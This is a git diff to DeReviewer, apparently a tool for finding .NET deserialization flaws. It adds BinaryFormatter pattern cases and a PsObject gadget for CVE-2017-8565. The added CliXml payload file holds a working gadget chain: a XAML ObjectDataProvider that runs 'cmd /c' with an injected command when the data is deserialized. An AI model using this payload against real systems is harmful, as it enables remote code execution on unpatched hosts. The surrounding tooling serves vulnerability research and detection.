diff --git a/DeReviewer.Analysis/DeReviewer.Analysis.csproj b/DeReviewer.Analysis/DeReviewer.Analysis.csproj
index 1705161..64d7d89 100644
--- a/DeReviewer.Analysis/DeReviewer.Analysis.csproj
+++ b/DeReviewer.Analysis/DeReviewer.Analysis.csproj
@@ -1,69 +1,68 @@
-
-
- Debug
- AnyCPU
- {495F718A-D925-4639-B6B9-00D00A17B3F6}
- Library
- Properties
- DeReviewer.Analysis
- DeReviewer.Analysis
- v4.8
- 512
-
-
- AnyCPU
- true
- full
- false
- bin\Debug\
- DEBUG;TRACE
- prompt
- 4
-
-
- AnyCPU
- pdbonly
- true
- bin\Release\
- TRACE
- prompt
- 4
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- {f1b76fe5-8338-4bf6-9570-b285e852952b}
- dnlib
-
-
-
-
-
-
+
\ No newline at end of file
diff --git a/DeReviewer.KnowledgeBase/Cases/BinaryFormatterPatterns.cs b/DeReviewer.KnowledgeBase/Cases/BinaryFormatterPatterns.cs
index 47b807f..8475bf2 100644
--- a/DeReviewer.KnowledgeBase/Cases/BinaryFormatterPatterns.cs
+++ b/DeReviewer.KnowledgeBase/Cases/BinaryFormatterPatterns.cs
@@ -4,52 +4,98 @@
namespace DeReviewer.KnowledgeBase.Cases
{
- public class BinaryFormatterPatterns : Case
- {
- public void Deserialize()
- {
- var serializer = new BinaryFormatter();
- Pattern.CreateBySignature(it =>
- serializer.Deserialize(
- it.IsPayloadOf().Format()));
- }
-
- public void DeserializeHeaderHandler()
- {
- var serializer = new BinaryFormatter();
- Pattern.CreateBySignature(it =>
- serializer.Deserialize(
- it.IsPayloadOf().Format(),
- null));
- }
-
- public void DeserializeMethodResponse()
- {
- var serializer = new BinaryFormatter();
- Pattern.CreateBySignature(it =>
- serializer.DeserializeMethodResponse(
- it.IsPayloadOf().Format(),
- null,
- null));
- }
-
- public void UnsafeDeserialize()
- {
- var serializer = new BinaryFormatter();
- Pattern.CreateBySignature(it =>
- serializer.UnsafeDeserialize(
- it.IsPayloadOf().Format(),
- null));
- }
-
- public void UnsafeDeserializeMethodResponse()
- {
- var serializer = new BinaryFormatter();
- Pattern.CreateBySignature(it =>
- serializer.UnsafeDeserializeMethodResponse(
- it.IsPayloadOf().Format(),
- null,
- null));
- }
+ public class BinaryFormatterPatterns : Case
+ {
+ public void DeserializeTypeConfuseDelegate()
+ {
+ var serializer = new BinaryFormatter();
+ Pattern.CreateBySignature(it =>
+ serializer.Deserialize(
+ it.IsPayloadOf().Format()));
+ }
+
+ public void DeserializePsObject()
+ {
+ var serializer = new BinaryFormatter();
+ Pattern.CreateBySignature(it =>
+ serializer.Deserialize(
+ it.IsPayloadOf().Format()));
+ }
+
+ public void DeserializeHeaderHandlerTypeConfuseDelegate()
+ {
+ var serializer = new BinaryFormatter();
+ Pattern.CreateBySignature(it =>
+ serializer.Deserialize(
+ it.IsPayloadOf().Format(),
+ null));
+ }
+
+ public void DeserializeHeaderHandlerPsObject()
+ {
+ var serializer = new BinaryFormatter();
+ Pattern.CreateBySignature(it =>
+ serializer.Deserialize(
+ it.IsPayloadOf().Format(),
+ null));
+ }
+
+ public void DeserializeMethodResponseTypeConfuseDelegate()
+ {
+ var serializer = new BinaryFormatter();
+ Pattern.CreateBySignature(it =>
+ serializer.DeserializeMethodResponse(
+ it.IsPayloadOf().Format(),
+ null,
+ null));
+ }
+
+ public void DeserializeMethodResponsePsObject()
+ {
+ var serializer = new BinaryFormatter();
+ Pattern.CreateBySignature(it =>
+ serializer.DeserializeMethodResponse(
+ it.IsPayloadOf().Format(),
+ null,
+ null));
+ }
+
+ public void UnsafeDeserializeTypeConfuseDelegate()
+ {
+ var serializer = new BinaryFormatter();
+ Pattern.CreateBySignature(it =>
+ serializer.UnsafeDeserialize(
+ it.IsPayloadOf().Format(),
+ null));
+ }
+
+ public void UnsafeDeserializePsObject()
+ {
+ var serializer = new BinaryFormatter();
+ Pattern.CreateBySignature(it =>
+ serializer.UnsafeDeserialize(
+ it.IsPayloadOf().Format(),
+ null));
+ }
+
+ public void UnsafeDeserializeMethodResponseTypeConfuseDelegate()
+ {
+ var serializer = new BinaryFormatter();
+ Pattern.CreateBySignature(it =>
+ serializer.UnsafeDeserializeMethodResponse(
+ it.IsPayloadOf().Format(),
+ null,
+ null));
+ }
+
+ public void UnsafeDeserializeMethodResponsePsObject()
+ {
+ var serializer = new BinaryFormatter();
+ Pattern.CreateBySignature(it =>
+ serializer.UnsafeDeserializeMethodResponse(
+ it.IsPayloadOf().Format(),
+ null,
+ null));
}
+ }
}
\ No newline at end of file
diff --git a/DeReviewer.KnowledgeBase/DeReviewer.KnowledgeBase.csproj b/DeReviewer.KnowledgeBase/DeReviewer.KnowledgeBase.csproj
index 43ef35a..5932718 100644
--- a/DeReviewer.KnowledgeBase/DeReviewer.KnowledgeBase.csproj
+++ b/DeReviewer.KnowledgeBase/DeReviewer.KnowledgeBase.csproj
@@ -37,6 +37,9 @@
+
+ ..\packages\Microsoft.PowerShell.5.ReferenceAssemblies.1.1.0\lib\net4\System.Management.Automation.dll
+
@@ -67,6 +70,7 @@
+
@@ -77,6 +81,7 @@
+
diff --git a/DeReviewer.KnowledgeBase/Gadgets/PsObject.cs b/DeReviewer.KnowledgeBase/Gadgets/PsObject.cs
new file mode 100644
index 0000000..1230064
--- /dev/null
+++ b/DeReviewer.KnowledgeBase/Gadgets/PsObject.cs
@@ -0,0 +1,39 @@
+using System;
+using System.IO;
+using System.Management.Automation;
+using System.Runtime.Serialization;
+using System.Runtime.Serialization.Formatters.Binary;
+
+namespace DeReviewer.KnowledgeBase.Gadgets
+{
+ // PsObject Gadget by Alvaro Munoz and Oleksandr Mirosh.
+ // Target must run a system not patched for CVE-2017-8565 (Published: 07/11/2017)
+ internal class PsObject : IGadget
+ {
+ public object Build(string command)
+ {
+ string clixmlData = File.ReadAllText(@"Payloads\PsObject.clixml")
+ .Replace("%CMD%", command);
+
+ return new PsObjectMarshal(clixmlData);
+ }
+ }
+
+ [Serializable]
+ internal class PsObjectMarshal : ISerializable
+ {
+ private readonly string clixmlData;
+
+ public void GetObjectData(SerializationInfo info, StreamingContext context)
+ {
+ Type typePso = typeof(PSObject);
+ info.SetType(typePso);
+ info.AddValue("CliXml", clixmlData);
+ }
+
+ public PsObjectMarshal(string clixmlData)
+ {
+ this.clixmlData = clixmlData;
+ }
+ }
+}
diff --git a/DeReviewer.KnowledgeBase/Payloads/PsObject.clixml b/DeReviewer.KnowledgeBase/Payloads/PsObject.clixml
new file mode 100644
index 0000000..6e9f222
--- /dev/null
+++ b/DeReviewer.KnowledgeBase/Payloads/PsObject.clixml
@@ -0,0 +1,63 @@
+
+
+
+ Microsoft.Management.Infrastructure.CimInstance#System.Management.Automation/RunspaceInvoke5
+ Microsoft.Management.Infrastructure.CimInstance#RunspaceInvoke5
+ Microsoft.Management.Infrastructure.CimInstance
+ System.Object
+
+ RunspaceInvoke5
+
+
+ RunspaceInvoke5
+
+
+
+
+ System.Windows.Markup.XamlReader[], PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35
+ System.Array
+ System.Object
+
+
+
+ <ResourceDictionary
+ xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
+ xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
+ xmlns:System="clr-namespace:System;assembly=mscorlib"
+ xmlns:Diag="clr-namespace:System.Diagnostics;assembly=system">
+ <ObjectDataProvider x:Key="LaunchCalc" ObjectType = "{ x:Type Diag:Process}" MethodName = "Start" >
+ <ObjectDataProvider.MethodParameters>
+ <System:String>cmd</System:String>
+ <System:String>/c "%CMD%" </System:String>
+ </ObjectDataProvider.MethodParameters>
+ </ObjectDataProvider>
+</ResourceDictionary>
+
+
+
+
+
+
+
+ System.Collections.ArrayList
+ System.Object
+
+
+
+
+ RunspaceInvoke5
+ System.Management.Automation
+
+ 460929192
+ <CLASS NAME="RunspaceInvoke5" ><PROPERTY NAME="test1" TYPE ="string" ></PROPERTY></CLASS>
+
+
+
+
+
+
+
+